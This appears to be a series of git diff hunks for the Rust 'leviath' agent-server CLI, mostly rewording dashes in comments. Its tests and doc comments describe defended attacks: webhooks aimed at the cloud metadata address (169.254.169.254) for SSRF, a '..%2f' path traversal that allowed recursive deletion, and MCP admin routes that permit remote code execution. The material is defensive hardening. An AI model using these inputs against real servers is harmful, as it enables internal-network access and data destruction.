         // `Err(e)` arm (as opposed to the `NotFound` "try next candidate"
         // arm already covered above).
         let not_executable = dir.join("not-executable");
@@ -1481,13 +1481,13 @@ mod tests {
 
     /// Exercises the final `bail!("No editor found...")` in
     /// [`launch_editor_with`] via the injected `run` seam rather than real
-    /// PATH/filesystem state -- see the doc comment on `launch_editor_with`
+    /// PATH/filesystem state - see the doc comment on `launch_editor_with`
     /// for why that matters on Windows specifically (real PATH-starvation
     /// can't fail `Command::new("notepad")`, which resolves via `System32`
     /// unconditionally). Forcing every candidate to fail with `NotFound`
     /// here doesn't depend on the platform at all: no real process is ever
-    /// spawned, so this runs identically -- and actually proves the `bail!`
-    /// line is reachable production code -- on Unix, Windows, and macOS
+    /// spawned, so this runs identically - and actually proves the `bail!`
+    /// line is reachable production code - on Unix, Windows, and macOS
     /// alike. Doesn't need `ENV_LOCK`/`PATH_ENV_LOCK`: whatever `$VISUAL`/
     /// `$EDITOR` happen to be set to by a concurrently-running test is
     /// irrelevant, since the injected closure fails every candidate the same
@@ -1513,7 +1513,7 @@ mod tests {
     // Windows resolves "notepad" via the System32 search path regardless of
     // $PATH, so PATH-starvation can't produce a "no editor found" outcome
     // there the way it does on Unix (breaking PATH so vim/nano/vi can't
-    // resolve) -- gated to `unix` for the same real-blocking-editor-hang
+    // resolve) - gated to `unix` for the same real-blocking-editor-hang
     // reason as the tests above. Kept alongside
     // `launch_editor_with_no_editor_found_when_every_candidate_not_found`
     // above as extra real-subprocess insurance on Unix; the injected-seam
@@ -1521,7 +1521,7 @@ mod tests {
     #[cfg(unix)]
     #[test]
     fn launch_editor_no_editor_found_when_path_has_no_candidates() {
-        // No VISUAL/EDITOR (both unset), and PATH points nowhere -- so even
+        // No VISUAL/EDITOR (both unset), and PATH points nowhere - so even
         // the unix platform-default candidates (vim/nano/vi) all fail to
         // resolve.
         temp_env::with_vars(
@@ -1550,7 +1550,7 @@ mod tests {
     // Windows can't reuse the Unix tests above verbatim: `/usr/bin/true` /
     // `/usr/bin/false` don't exist, shebang scripts can't execute (`os error
     // 193`), and Unix permission bits (`PermissionsExt`) don't apply. Batch
-    // (`.bat`) files stand in for the shebang scripts -- they're directly
+    // (`.bat`) files stand in for the shebang scripts - they're directly
     // executable via `Command::new(path)` on Windows, exit instantly, and
     // never touch a real interactive editor.
     //
@@ -1562,7 +1562,7 @@ mod tests {
     // status-to-outcome decision lives in the pure `classify_editor_exit`
     // (unit-tested for the code-less case on every platform), and the
     // "outcome == Aborted, try next" arm is driven directly via injection in
-    // `launch_editor_with_aborted_candidate_falls_through_to_next` -- both
+    // `launch_editor_with_aborted_candidate_falls_through_to_next` - both
     // cross-platform, no code-less `ExitStatus` required.
     //
     // Three other Unix tests rely on PATH-starvation --
@@ -1575,7 +1575,7 @@ mod tests {
     // this candidate" step itself (`launch_editor_with`'s `run` parameter) or
     // the "launch the editor" step (`resolve_task_with_editor`'s
     // `launch_editor_fn` parameter) sidesteps real process resolution
-    // entirely, closing all three gaps on every platform -- see
+    // entirely, closing all three gaps on every platform - see
     // `launch_editor_with_no_editor_found_when_every_candidate_not_found`,
     // `launch_editor_with_empty_visual_and_editor_are_skipped`, and
     // `resolve_task_with_editor_injected_editor_failure_propagates` above.
@@ -1636,7 +1636,7 @@ mod tests {
             std::fs::write(&file, "content").unwrap();
 
             // A non-zero-but-present exit code is treated as the user having
-            // closed the editor -- not an error.
+            // closed the editor - not an error.
             let result = launch_editor(&file);
             assert_launch_ok(&result);
 
@@ -1740,7 +1740,7 @@ mod tests {
         let _ = std::fs::create_dir_all(&dir);
         // A plain, non-executable text file: Windows' `CreateProcess` can't
         // recognize it as an executable image and fails with
-        // `ERROR_BAD_EXE_FORMAT` (os error 193), not `NotFound` -- exercising
+        // `ERROR_BAD_EXE_FORMAT` (os error 193), not `NotFound` - exercising
         // the generic `Err(e)` arm (as opposed to the `NotFound` "try next
         // candidate" arm already covered above).
         let not_executable = dir.join("not-executable.txt");
@@ -1774,7 +1774,7 @@ mod tests {
         use std::os::unix::fs::PermissionsExt;
 
         // A tiny "editor" script that appends a non-comment line to
-        // whatever file it's invoked on ($1) -- standing in for a real
+        // whatever file it's invoked on ($1) - standing in for a real
         // interactive editor session.
         let dir = std::env::temp_dir().join("lev-test-resolve-task-editor-happy");
         let _ = std::fs::create_dir_all(&dir);
@@ -1805,7 +1805,7 @@ mod tests {
     #[test]
     fn resolve_task_with_editor_path_empty_after_stripping_comments_errors() {
         // /usr/bin/true "opens" the file and does nothing to it, so only the
-        // commented-out template remains -- stripped down to an empty task.
+        // commented-out template remains - stripped down to an empty task.
         temp_env::with_vars(
             [("VISUAL", Some("/usr/bin/true")), ("EDITOR", None)],
             || {
@@ -1823,7 +1823,7 @@ mod tests {
     #[cfg(unix)]
     #[test]
     fn resolve_task_with_editor_path_propagates_launch_editor_error() {
-        // No VISUAL/EDITOR (both unset), and PATH points nowhere -- so even
+        // No VISUAL/EDITOR (both unset), and PATH points nowhere - so even
         // the unix platform-default candidates (vim/nano/vi) all fail to
         // resolve, propagating the "no editor found" error.
         temp_env::with_vars(
@@ -1849,7 +1849,7 @@ mod tests {
     /// rather than an inline closure per call site so that if the latter
     /// test's control flow ever regresses and this stub *does* get called,
     /// llvm-cov's function-level coverage for it is still merged from the
-    /// former test -- an inline closure unique to the latter test would
+    /// former test - an inline closure unique to the latter test would
     /// otherwise show up as a brand new "0 calls" function purely because
     /// that particular test is designed to never reach it.
     fn stub_editor_returns_no_editor_found(_path: &std::path::Path) -> anyhow::Result<()> {
@@ -1860,7 +1860,7 @@ mod tests {
 
     /// Cross-platform twin of
     /// `resolve_task_with_editor_path_propagates_launch_editor_error` via
-    /// `resolve_task_with_editor`'s injected editor launcher -- see that
+    /// `resolve_task_with_editor`'s injected editor launcher - see that
     /// function's doc comment for why real PATH-starvation can't be mirrored
     /// on Windows here. Doesn't touch `PATH`/`VISUAL`/`EDITOR` at all (no
     /// `ENV_LOCK`/`PATH_ENV_LOCK` needed): the injected closure fails
@@ -1884,7 +1884,7 @@ mod tests {
     /// `write_task_template_error_on_bad_path` below, which calls
     /// `write_task_template` directly). The real OS temp directory used in
     /// production is essentially always writable, so this is only reachable
-    /// at all via the injected `tmp_dir_fn` -- pointed here at a directory
+    /// at all via the injected `tmp_dir_fn` - pointed here at a directory
     /// whose parent doesn't exist, so the write fails deterministically on
     /// both Unix (ENOENT) and Windows (ERROR_PATH_NOT_FOUND) before the
     /// editor launcher is ever reached (if it *were* reached, the assertion
@@ -1912,13 +1912,13 @@ mod tests {
         );
     }
 
-    // ─── resolve_task_with: editor path (stdin is a TTY) — Windows twins ──
+    // ─── resolve_task_with: editor path (stdin is a TTY) - Windows twins ──
 
     #[cfg(windows)]
     #[test]
     fn resolve_task_with_editor_path_happy_case() {
         // A tiny batch "editor" that appends a non-comment line to whatever
-        // file it's invoked on (%~1) -- standing in for a real interactive
+        // file it's invoked on (%~1) - standing in for a real interactive
         // editor session. `%~1` strips any surrounding quotes Windows adds
         // around a path containing spaces.
         let dir = std::env::temp_dir().join("lev-test-resolve-task-editor-happy-win");
@@ -1943,7 +1943,7 @@ mod tests {
     #[test]
     fn resolve_task_with_editor_path_empty_after_stripping_comments_errors() {
         // A no-op batch file "opens" the file and does nothing to it, so
-        // only the commented-out template remains -- stripped down to an
+        // only the commented-out template remains - stripped down to an
         // empty task.
         let dir = std::env::temp_dir().join("lev-test-resolve-task-editor-empty-win");
         let _ = std::fs::create_dir_all(&dir);
@@ -2040,7 +2040,7 @@ mod tests {
     // Windows has no chmod-style permission bits; instead, opening the file
     // for writing with a zero share mode (no `FILE_SHARE_READ`) makes any
     // concurrent read attempt fail with a sharing violation for as long as
-    // the handle stays open -- a deterministic Windows-native way to force
+    // the handle stays open - a deterministic Windows-native way to force
     // the same "file exists but can't be read" outcome the Unix test above
     // produces via `chmod 000`.
     #[cfg(windows)]

--- a/crates/leviath-cli/src/commands/serve/agents.rs
+++ b/crates/leviath-cli/src/commands/serve/agents.rs
@@ -348,7 +348,7 @@ mod tests {
         );
 
         // Inside the root, but pointing the completion webhook at the cloud
-        // metadata service — a request the daemon would make on the caller's
+        // metadata service - a request the daemon would make on the caller's
         // behalf, from inside the trust boundary.
         let err = spawn_agent(
             State(state.clone()),
@@ -435,7 +435,7 @@ mod tests {
             ..Default::default()
         };
         // The same URL the default refuses. That this flips on the setting --
-        // rather than everything being refused either way -- is what shows the
+        // rather than everything being refused either way - is what shows the
         // check is reading the address and not just saying no.
         let url = "http://127.0.0.1:9000/hook";
         assert!(limits.check_callback_url(url).is_ok());
@@ -457,7 +457,7 @@ mod tests {
         assert!(limits.check_workdir(&root.path().join("escape")).is_err());
     }
 
-    /// With no `--workdir-root`, behavior is unchanged — the flag is opt-in for
+    /// With no `--workdir-root`, behavior is unchanged - the flag is opt-in for
     /// operators, not a new hard requirement on every deployment.
     #[test]
     fn no_workdir_root_permits_anything() {
@@ -682,7 +682,7 @@ prompt = "Plan the work"
                 create_run(&meta).unwrap();
 
                 // Create a second run with Running status so the filtered list is
-                // non-empty — this makes the map/any closure in the assertion actually
+                // non-empty - this makes the map/any closure in the assertion actually
                 // execute, covering the closure body in LLVM's instrumentation.
                 let run_id2 = unique_run_id("list-filter-excl-running");
                 let mut meta2 = make_run(&run_id2);

--- a/crates/leviath-cli/src/commands/serve/auth.rs
+++ b/crates/leviath-cli/src/commands/serve/auth.rs
@@ -15,7 +15,7 @@ use axum::middleware::Next;
 use axum::response::{IntoResponse, Response};
 
 /// Resolve the API token from `--token` (`arg`) or the `LEVIATH_API_TOKEN`
-/// environment variable. Returns an error — refusing to start — when neither is
+/// environment variable. Returns an error - refusing to start - when neither is
 /// set, so an unauthenticated agent-spawning API can never be launched.
 pub(super) fn resolve_token(arg: Option<&str>) -> anyhow::Result<String> {
     if let Some(t) = arg.map(str::trim).filter(|t| !t.is_empty()) {
@@ -42,12 +42,12 @@ pub(super) fn resolve_token(arg: Option<&str>) -> anyhow::Result<String> {
 /// `state` check used plain `==` until it was pointed at this one.
 use leviath_core::constant_time_eq;
 
-/// The token a request presents: `Authorization: Bearer <token>`, else — **on
-/// the WebSocket routes only** — the `token` query parameter.
+/// The token a request presents: `Authorization: Bearer <token>`, else - **on
+/// the WebSocket routes only** - the `token` query parameter.
 ///
 /// The query form exists because a browser cannot set request headers on a
 /// WebSocket upgrade. It used to be accepted on *every* route, which meant an
-/// ordinary REST call could authenticate with the token in its URL — and a URL
+/// ordinary REST call could authenticate with the token in its URL - and a URL
 /// ends up in reverse-proxy access logs, browser history, and `Referer` headers
 /// on any outbound link. Restricting it to the routes that genuinely cannot use
 /// a header keeps the escape hatch without spreading the credential.

--- a/crates/leviath-cli/src/commands/serve/auth.rs
+++ b/crates/leviath-cli/src/commands/serve/auth.rs
@@ -46,11 +46,11 @@ use leviath_core::constant_time_eq;
 /// the WebSocket routes only** - the `token` query parameter.
 ///
 /// The query form exists because a browser cannot set request headers on a
-/// WebSocket upgrade. It used to be accepted on *every* route, which meant an
-/// ordinary REST call could authenticate with the token in its URL - and a URL
-/// ends up in reverse-proxy access logs, browser history, and `Referer` headers
-/// on any outbound link. Restricting it to the routes that genuinely cannot use
-/// a header keeps the escape hatch without spreading the credential.
+/// WebSocket upgrade. Accepting it on *every* route would let an ordinary REST
+/// call authenticate with the token in its URL - and a URL ends up in
+/// reverse-proxy access logs, browser history, and `Referer` headers on any
+/// outbound link. Restricting it to the routes that genuinely cannot use a
+/// header keeps the escape hatch without spreading the credential.
 fn presented_token(req: &Request) -> Option<String> {
     if let Some(bearer) = req
         .headers()

--- a/crates/leviath-cli/src/commands/serve/blueprints.rs
+++ b/crates/leviath-cli/src/commands/serve/blueprints.rs
@@ -472,7 +472,7 @@ prompt = "p"
     }
 
     /// `DELETE /api/blueprints/{name}` reached `fs::remove_dir_all` on the same
-    /// unvalidated join — arbitrary recursive deletion for any token holder.
+    /// unvalidated join - arbitrary recursive deletion for any token holder.
     /// A percent-encoded `..%2f` decodes *after* segment matching, so the
     /// decoded form is what has to be rejected.
     #[tokio::test]
@@ -498,7 +498,7 @@ prompt = "p"
     #[tokio::test]
     async fn create_blueprint_dir_creation_failure_returns_500() {
         // Force `create_dir_all` to fail deterministically by pre-creating a
-        // regular *file* at the target path — a directory can't be created
+        // regular *file* at the target path - a directory can't be created
         // where a non-directory entry already exists. This is cross-platform:
         // both Unix (ENOTDIR/EEXIST) and Windows (ERROR_ALREADY_EXISTS) refuse
         // to create a directory at a path that's already occupied by a file.
@@ -600,7 +600,7 @@ prompt = "p"
         let resp = app.oneshot(req).await.unwrap();
         assert_eq!(resp.status(), axum::http::StatusCode::INTERNAL_SERVER_ERROR);
 
-        // Test-only cleanup so the temp dir can be removed afterward -- not
+        // Test-only cleanup so the temp dir can be removed afterward - not
         // production/security-relevant code, so clippy's warning about
         // `set_readonly(false)` making the file world-writable on Unix
         // doesn't apply here.
@@ -792,9 +792,9 @@ prompt = "Run"
     /// removable-but-`readonly` obstacles. A real sharing violation does
     /// still block deletion, though: holding an exclusive (no-share) file
     /// handle open on a file inside the directory for the duration of the
-    /// request -- the same technique
+    /// request - the same technique
     /// `session.rs`'s `resolve_task_unreadable_file_returns_error` Windows
-    /// twin uses -- reliably makes `remove_dir_all` fail there.
+    /// twin uses - reliably makes `remove_dir_all` fail there.
     #[cfg(windows)]
     #[tokio::test]
     async fn delete_blueprint_removal_failure_returns_500_windows() {
@@ -921,7 +921,7 @@ prompt = "Run"
     async fn validate_blueprint_parses_but_fails_structural_validation_returns_ok_valid_false() {
         // Distinct from the manifest above: this one parses fine as TOML/a
         // Blueprint (Ok(bp) from parse_manifest), but bp.validate()
-        // itself rejects it -- an entry_stage that doesn't match any defined
+        // itself rejects it - an entry_stage that doesn't match any defined
         // stage. Exercises the `Ok(bp) => match bp.validate() { Err(e) => .. }`
         // arm, which `validate_blueprint_invalid_manifest_returns_ok_valid_false`
         // (a parse failure) never reaches.

--- a/crates/leviath-cli/src/commands/serve/blueprints.rs
+++ b/crates/leviath-cli/src/commands/serve/blueprints.rs
@@ -12,10 +12,10 @@ use leviath_core::manifest::parse_manifest;
 
 /// Resolve the installed agents directory.
 ///
-/// Goes through the shared home resolver so `LEVIATH_HOME` applies here too. It
-/// previously called `dirs::home_dir()` directly, which meant these handlers
-/// read and wrote a *different* directory from the one `lev add` installs into
-/// whenever that override was set.
+/// Goes through the shared home resolver so `LEVIATH_HOME` applies here too.
+/// Calling `dirs::home_dir()` directly would have these handlers read and
+/// write a *different* directory from the one `lev add` installs into
+/// whenever that override is set.
 pub(super) fn agents_dir() -> PathBuf {
     leviath_core::paths::agents_dir().unwrap_or_default()
 }

--- a/crates/leviath-cli/src/commands/serve/mcp.rs
+++ b/crates/leviath-cli/src/commands/serve/mcp.rs
@@ -91,7 +91,7 @@ fn auth_status(server: &MCPServerConfig, store: &AuthStore, now: u64) -> String 
     }
 }
 
-/// `GET /api/mcp/servers` — list configured servers with their auth status.
+/// `GET /api/mcp/servers` - list configured servers with their auth status.
 pub(super) async fn list_servers(State(state): State<AppState>) -> impl IntoResponse {
     let admin = &state.mcp;
     let config = match Config::load_from_path_public(&admin.config_path) {
@@ -122,7 +122,7 @@ pub(super) struct AddServerRequest {
     headers: std::collections::HashMap<String, String>,
 }
 
-/// `POST /api/mcp/servers` — add a server.
+/// `POST /api/mcp/servers` - add a server.
 pub(super) async fn add_server(
     State(state): State<AppState>,
     Json(req): Json<AddServerRequest>,
@@ -162,7 +162,7 @@ pub(super) async fn add_server(
         .into_response()
 }
 
-/// `DELETE /api/mcp/servers/{name}` — remove a server and its credentials.
+/// `DELETE /api/mcp/servers/{name}` - remove a server and its credentials.
 pub(super) async fn remove_server(
     State(state): State<AppState>,
     AxumPath(name): AxumPath<String>,
@@ -192,7 +192,7 @@ pub(super) async fn remove_server(
     StatusCode::NO_CONTENT.into_response()
 }
 
-/// `POST /api/mcp/servers/{name}/login` — run the OAuth browser flow.
+/// `POST /api/mcp/servers/{name}/login` - run the OAuth browser flow.
 ///
 /// On the host running `lev serve` this opens the operator's browser and
 /// completes the loopback redirect, the same flow `lev mcp login` uses.
@@ -245,7 +245,7 @@ pub(super) async fn login(
     Json(serde_json::json!({ "status": "authenticated", "server": name })).into_response()
 }
 
-/// `GET /api/mcp/servers/{name}/status` — one server's transport and auth state.
+/// `GET /api/mcp/servers/{name}/status` - one server's transport and auth state.
 pub(super) async fn status(
     State(state): State<AppState>,
     AxumPath(name): AxumPath<String>,
@@ -266,7 +266,7 @@ pub(super) async fn status(
     Json(McpServerInfo::describe(server, &store, (admin.clock)())).into_response()
 }
 
-/// `POST /api/mcp/servers/{name}/test` — connect and report the tool count.
+/// `POST /api/mcp/servers/{name}/test` - connect and report the tool count.
 pub(super) async fn test_server(
     State(state): State<AppState>,
     AxumPath(name): AxumPath<String>,

--- a/crates/leviath-cli/src/commands/serve/mod.rs
+++ b/crates/leviath-cli/src/commands/serve/mod.rs
@@ -1,7 +1,7 @@
-//! `lev serve` — REST + WebSocket API server.
+//! `lev serve` - REST + WebSocket API server.
 //!
 //! Exposes agent management, blueprint CRUD, and live event streaming over
-//! HTTP. No web UI — the frontend lives in a separate repo.
+//! HTTP. No web UI - the frontend lives in a separate repo.
 
 mod agents;
 mod auth;
@@ -31,7 +31,7 @@ use crate::config::Config;
 
 // ─── Entrypoint ──────────────────────────────────────────────────────────────
 
-/// Aborts a spawned task when dropped — including when dropped mid-flight as
+/// Aborts a spawned task when dropped - including when dropped mid-flight as
 /// part of an outer future's cancellation (e.g. `JoinHandle::abort()` on the
 /// task that owns this guard), not just on normal scope exit.
 struct AbortOnDrop<T>(tokio::task::JoinHandle<T>);
@@ -115,9 +115,9 @@ fn api_router() -> Router<AppState> {
 /// the server gracefully and cover the `Ok(())` return path.
 ///
 /// Takes `shutdown` as a boxed trait object (`Pin<Box<dyn Future<...>>>`)
-/// rather than `impl Future<...>` so every caller -- production's
+/// rather than `impl Future<...>` so every caller - production's
 /// `std::future::pending()` and tests' various `async move { ... }` blocks
-/// awaiting a `oneshot::Receiver` -- shares exactly ONE monomorphization of
+/// awaiting a `oneshot::Receiver` - shares exactly ONE monomorphization of
 /// this (large, multi-branch) function instead of one per concrete future
 /// type. Confirmed via HTML/JSON segment inspection that every source
 /// position has a covered instantiation (this is the same trait-object-erasure
@@ -126,7 +126,7 @@ fn api_router() -> Router<AppState> {
 /// `ready`, if given, is sent the real bound `SocketAddr` right after
 /// `TcpListener::bind` succeeds (before serving starts). Production passes
 /// `None`; tests pass `Some(tx)` with `args.port = 0` so the OS picks a free
-/// port and the test learns which one was actually bound directly -- no
+/// port and the test learns which one was actually bound directly - no
 /// probe-bind-drop-rebind dance, which is a genuine TOCTOU race (confirmed
 /// to reproduce on real CI: another process/test could grab the just-freed
 /// port before this function's own bind runs), not just a test-only
@@ -137,13 +137,13 @@ async fn execute_with_shutdown(
     shutdown: std::pin::Pin<Box<dyn std::future::Future<Output = ()> + Send>>,
     ready: Option<tokio::sync::oneshot::Sender<SocketAddr>>,
 ) -> anyhow::Result<()> {
-    // Resolve the API token before binding — refuse to start unauthenticated.
+    // Resolve the API token before binding - refuse to start unauthenticated.
     let auth_token = std::sync::Arc::new(auth::resolve_token(args.token.as_deref())?);
     // The API can spawn tool-executing agents; loudly warn if bound off-host.
     if args.host != "127.0.0.1" && args.host != "localhost" && args.host != "::1" {
         tracing::warn!(
             host = %args.host,
-            "serving the agent API on a non-local address — anyone who can reach \
+            "serving the agent API on a non-local address - anyone who can reach \
              this host and holds the token can spawn agents"
         );
     }
@@ -172,7 +172,7 @@ async fn execute_with_shutdown(
     // Background world-event consumer: subscribes to the daemon's pushed
     // `WorldEvent` stream and forwards each event to WebSocket subscribers.
     // Held behind an abort-on-drop guard so the task is torn down whenever this
-    // function returns *or* is cancelled — e.g. when a test aborts the outer
+    // function returns *or* is cancelled - e.g. when a test aborts the outer
     // `execute()`/`execute_with_shutdown()` task. Without this, aborting only
     // the outer task left the inner `event_loop` (an unconditional
     // subscribe-and-reconnect loop) running detached until the whole runtime
@@ -195,7 +195,7 @@ async fn execute_with_shutdown(
                 .allow_headers(Any),
         ),
         Some(origin) => {
-            // An unparseable value used to fall back to `*` — silently turning a
+            // An unparseable value used to fall back to `*` - silently turning a
             // typo into "allow everything", the opposite of what was asked for.
             // Refuse to start instead.
             let value = origin.parse::<axum::http::HeaderValue>().map_err(|_| {
@@ -214,7 +214,7 @@ async fn execute_with_shutdown(
 
     // The MCP administration endpoints are remote code execution by
     // construction: `add_server` writes a `command` and `args` into
-    // `~/.leviath/config.toml`, and Leviath then spawns exactly that — for this
+    // `~/.leviath/config.toml`, and Leviath then spawns exactly that - for this
     // run and every future one. The rest of the API can only run agents the user
     // already installed. Not mounted unless the operator asked for them, so an
     // unmounted route 404s rather than relying on a check inside the handler
@@ -255,7 +255,7 @@ async fn execute_with_shutdown(
             .expect("infallible: a freshly bound TcpListener always has a local address");
         let _ = ready.send(local_addr);
     }
-    // axum::serve with graceful shutdown always returns Ok(()) — discard the
+    // axum::serve with graceful shutdown always returns Ok(()) - discard the
     // infallible Result so LLVM-cov does not instrument an unreachable Err branch.
     let _ = axum::serve(listener, app)
         .with_graceful_shutdown(shutdown)
@@ -293,7 +293,7 @@ mod tests {
         assert_execute_failed_on_malformed_config(&Ok(()));
     }
 
-    /// See [`assert_execute_failed_on_malformed_config`] — same rationale,
+    /// See [`assert_execute_failed_on_malformed_config`] - same rationale,
     /// for the bad-API-key startup failure-message region.
     fn assert_connected_with_bad_api_key(connected: bool) {
         assert!(connected, "server should start even with a bad API key");
@@ -305,7 +305,7 @@ mod tests {
         assert_connected_with_bad_api_key(false);
     }
 
-    /// See [`assert_execute_failed_on_malformed_config`] — same rationale,
+    /// See [`assert_execute_failed_on_malformed_config`] - same rationale,
     /// for the graceful-shutdown return-value failure-message region.
     fn assert_execute_returned_ok_after_shutdown(result: &Result<(), anyhow::Error>) {
         assert!(
@@ -320,7 +320,7 @@ mod tests {
         assert_execute_returned_ok_after_shutdown(&Err(anyhow::anyhow!("boom")));
     }
 
-    /// See [`assert_execute_failed_on_malformed_config`] — same rationale,
+    /// See [`assert_execute_failed_on_malformed_config`] - same rationale,
     /// for the port-in-use failure-message region.
     fn assert_execute_failed_on_port_in_use(result: &anyhow::Result<()>) {
         assert!(
@@ -335,7 +335,7 @@ mod tests {
         assert_execute_failed_on_port_in_use(&Ok(()));
     }
 
-    /// See [`assert_execute_failed_on_malformed_config`] — same rationale,
+    /// See [`assert_execute_failed_on_malformed_config`] - same rationale,
     /// for `execute_with_shutdown`'s graceful-shutdown return-value
     /// failure-message region.
     fn assert_execute_with_shutdown_returned_ok(result: &Result<(), anyhow::Error>) {
@@ -351,7 +351,7 @@ mod tests {
         assert_execute_with_shutdown_returned_ok(&Err(anyhow::anyhow!("boom")));
     }
 
-    /// See [`assert_execute_failed_on_malformed_config`] — same rationale,
+    /// See [`assert_execute_failed_on_malformed_config`] - same rationale,
     /// for the HTTP response status-line failure-message region.
     fn assert_response_ok(resp_str: &str) {
         assert!(resp_str.starts_with("HTTP/1.1 200"), "got: {resp_str}");
@@ -569,7 +569,7 @@ model = "claude-sonnet-4-6"
     #[tokio::test]
     async fn test_interaction_route_reaches_daemon() {
         // The route is wired to the handler, which (with no daemon in this test)
-        // reports the daemon unreachable — proving the request reached it.
+        // reports the daemon unreachable - proving the request reached it.
         let app = test_app();
         let req = Request::builder()
             .uri("/api/agents/nonexistent/interaction")
@@ -838,7 +838,7 @@ prompt = "Run"
         assert_eq!(resp.status(), StatusCode::SERVICE_UNAVAILABLE);
     }
 
-    // ─── execute() — real server bootstrap ─────────────────────────────────
+    // ─── execute() - real server bootstrap ─────────────────────────────────
     //
     // These drive the actual `execute()` entrypoint (config load, CORS setup,
     // full router construction, real TCP bind, background polling spawn) end
@@ -847,14 +847,14 @@ prompt = "Run"
     // task is aborted once we've proven the server is up and responding.
     //
     // Each holds `isolate_config_path_for_test` even though none of them
-    // care about specific config *content* -- their own `Config::load()`
+    // care about specific config *content* - their own `Config::load()`
     // call needs protecting from a DIFFERENT concurrently-running test that
     // does mutate `LEVIATH_CONFIG_PATH` (e.g. `execute_with_malformed_config_
     // returns_err`, which points it at a file containing invalid TOML for
     // the duration of its own guard). `std::env::set_var` is process-global,
     // not thread-local, so without holding the same lock here, this test's
     // `Config::load()` could transiently observe that other test's malformed
-    // path and fail with a real (if confusing) parse error -- confirmed to
+    // path and fail with a real (if confusing) parse error - confirmed to
     // reproduce locally at default test-thread concurrency, not a hypothetical.
 
     #[tokio::test]
@@ -867,7 +867,7 @@ prompt = "Run"
                 // time; execute_with_shutdown reports the real bound SocketAddr back
                 // via `ready` the instant it's bound, so there's no
                 // probe-bind-drop-rebind gap for another process/test to race into
-                // (that gap is a real, CI-reproducing TOCTOU -- see
+                // (that gap is a real, CI-reproducing TOCTOU - see
                 // execute_with_shutdown's doc comment). Exercises the exact same
                 // production code path execute() does (its own body is just this
                 // call with `ready: None`), so this remains a real end-to-end test
@@ -1076,7 +1076,7 @@ prompt = "Run"
     /// that is never assigned to a local interface, so the bind always fails
     /// with `EADDRNOTAVAIL`. (A prior version reused an already-bound ephemeral
     /// port, which occasionally let the second bind succeed under parallel-test
-    /// load and left this region uncovered — a genuine flake.)
+    /// load and left this region uncovered - a genuine flake.)
     #[tokio::test]
     async fn execute_with_unbindable_address_returns_bind_error() {
         // Isolated: this reaches `Config::load()`, which reads process-wide
@@ -1214,8 +1214,8 @@ prompt = "Run"
     async fn cors_is_off_by_default_explicit_when_asked_and_fatal_when_malformed() {
         // Isolated because `execute_with_shutdown` calls `Config::load()`, which
         // reads process-wide environment. Without this the test raced every
-        // `temp_env` test in the binary — `temp_env` serializes against its own
-        // calls, not against a test that reads the environment directly — and
+        // `temp_env` test in the binary - `temp_env` serializes against its own
+        // calls, not against a test that reads the environment directly - and
         // failed on CI in two different places depending on when it lost.
         crate::config::with_isolated_config_path_async("serve-mod-cors", |_fake_dir| async move {
             fn args_with(cors: Option<&str>) -> ServeArgs {
@@ -1231,7 +1231,7 @@ prompt = "Run"
             }
 
             /// Start, wait until bound, then shut down. Only reached for values that
-            /// are accepted — a rejected one never binds.
+            /// are accepted - a rejected one never binds.
             async fn starts(cors: Option<&str>) {
                 let (ready_tx, ready_rx) = tokio::sync::oneshot::channel();
                 let (stop_tx, stop_rx) = tokio::sync::oneshot::channel();
@@ -1244,7 +1244,7 @@ prompt = "Run"
                     Some(ready_tx),
                 ));
                 // `RecvError` here means the sender was dropped, which any early
-                // return from `execute_with_shutdown` does — so this reads as "the
+                // return from `execute_with_shutdown` does - so this reads as "the
                 // server failed to start" without saying why. Left as-is rather
                 // than adding a reporting branch that only a failing run executes,
                 // which the coverage gate would (correctly) flag as dead.

--- a/crates/leviath-cli/src/commands/serve/mod.rs
+++ b/crates/leviath-cli/src/commands/serve/mod.rs
@@ -195,9 +195,9 @@ async fn execute_with_shutdown(
                 .allow_headers(Any),
         ),
         Some(origin) => {
-            // An unparseable value used to fall back to `*` - silently turning a
-            // typo into "allow everything", the opposite of what was asked for.
-            // Refuse to start instead.
+            // An unparseable value must not fall back to `*` - that silently
+            // turns a typo into "allow everything", the opposite of what was
+            // asked for. Refuse to start instead.
             let value = origin.parse::<axum::http::HeaderValue>().map_err(|_| {
                 anyhow::anyhow!("--cors value '{origin}' is not a valid origin header")
             })?;

--- a/crates/leviath-cli/src/commands/serve/polling.rs
+++ b/crates/leviath-cli/src/commands/serve/polling.rs
@@ -1,7 +1,7 @@
 //! World-event consumer: subscribe to the daemon's pushed [`WorldEvent`] stream,
 //! map each event to a [`ServerEvent`] for WebSocket subscribers, and fire a
-//! completion webhook when a run finishes. Replaces the old filesystem poll - the
-//! daemon now pushes changes, so there is no polling interval.
+//! completion webhook when a run finishes. The daemon pushes changes, so there
+//! is no filesystem poll and no polling interval.
 
 use std::time::Duration;
 

--- a/crates/leviath-cli/src/commands/serve/polling.rs
+++ b/crates/leviath-cli/src/commands/serve/polling.rs
@@ -1,6 +1,6 @@
 //! World-event consumer: subscribe to the daemon's pushed [`WorldEvent`] stream,
 //! map each event to a [`ServerEvent`] for WebSocket subscribers, and fire a
-//! completion webhook when a run finishes. Replaces the old filesystem poll — the
+//! completion webhook when a run finishes. Replaces the old filesystem poll - the
 //! daemon now pushes changes, so there is no polling interval.
 
 use std::time::Duration;
@@ -28,7 +28,7 @@ pub(super) async fn event_loop(state: AppState, backoff: Duration) {
     // and it was checked once at `POST /api/agents` and then never again. A
     // caller registered a public endpoint that answered `307 Location:
     // http://169.254.169.254/…`, and since 307 preserves the method *and* the
-    // body, that was a repeatable POST primitive against the internal network —
+    // body, that was a repeatable POST primitive against the internal network -
     // re-followed on every retry.
     let client = leviath_core::checked_client(
         leviath_core::ClientTimeouts::default(),
@@ -308,7 +308,7 @@ mod tests {
     /// Spawn a fake webhook receiver that answers the i-th request with
     /// `statuses[i]` (each on its own connection, `Connection: close`), capturing
     /// every request's raw bytes. Serves exactly `statuses.len()` requests then
-    /// stops — so a test asserts the attempt count by matching `statuses.len()`
+    /// stops - so a test asserts the attempt count by matching `statuses.len()`
     /// to the number of requests the receiver's join handle yields.
     async fn fake_receiver(statuses: Vec<u16>) -> (String, tokio::task::JoinHandle<Vec<String>>) {
         let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await.unwrap();
@@ -553,7 +553,7 @@ mod tests {
 
     #[tokio::test]
     async fn fire_webhook_retries_transient_then_succeeds() {
-        // Two 503s then a 200 — delivery must make exactly three attempts.
+        // Two 503s then a 200 - delivery must make exactly three attempts.
         let (url, server) = fake_receiver(vec![503, 503, 200]).await;
         fire_webhook(
             reqwest::Client::new(),
